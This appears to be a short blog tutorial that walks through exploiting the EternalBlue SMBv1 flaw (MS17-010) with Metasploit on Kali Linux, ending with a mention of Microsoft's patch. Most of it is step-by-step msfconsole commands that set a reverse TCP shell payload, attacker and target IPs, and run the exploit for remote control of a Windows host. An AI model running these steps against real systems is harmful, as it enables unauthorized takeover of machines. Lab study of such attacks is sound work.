Attack Simulation: EternalBlue MS17-010 (Metasploit)

Attack Simulation: EternalBlue MS17-010 (Metasploit)

The vulnerability works by exploiting the Microsoft Server Message Block 1.0. The SMB is a network file sharing protocol and “allows applications on a computer to read and write to files and to request services” that are on the same network.

This demonstration will show you how to remotely take control of a system by exploiting the EternalBlue vulnerability using the MetaSploit frame work on Kali Linux.

Step 1: Start up the postgresql service and enter the Metasploit command line:

[email protected]:~# service postgresql start
[email protected]:~# msfconsole -q
msf >

Step 2: Select the EternalBlue exploit:

msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) >

Step 3: Select a payload to use:

There are two popular types of shells: bind and reverse. A bind shell is the kind that opens up a new service on the target machine, and requires the attacker to connect to it in order to get a session.

A reverse shell (also known as a connect-back) is the exact opposite: it requires the attacker to set up a listener first on his box, the target machine acts as a client connecting to that listener, and then finally the attacker receives the shell.

msf exploit(ms17_010_eternalblue) > set payload generic/shell_reverse_tcp

Options now need to be set so that the connection can be made back to the attacking system. The LHOST is the local host, the attacking machine. The RHOST is the remote host, the machine you want to target. Set the following two options:

msf exploit(ms17_010_eternalblue) > set LHOST 192.168.0.10 (attacker IP)
msf exploit(ms17_010_eternalblue) > set RHOST 192.168.0.11 (target IP)

Step 4: Execute the exploit:

msf exploit(ms17_010_eternalblue) > exploit

You should now see progress in the metasploit console whether or not the exploit has executed.

If the attack has been successful, then you should see output from Microsoft Command Prompt from the target PC.

Microsoft has released a security update for (4013389) which can be downloaded from the Microsoft Security Bulletin page. The SMB 1 functionality has now been disabled in Windows 10 by default.

Leave a Comment